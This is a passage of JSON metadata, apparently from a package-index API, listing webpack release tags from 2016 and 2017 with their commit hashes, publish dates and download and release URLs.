ithub.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"t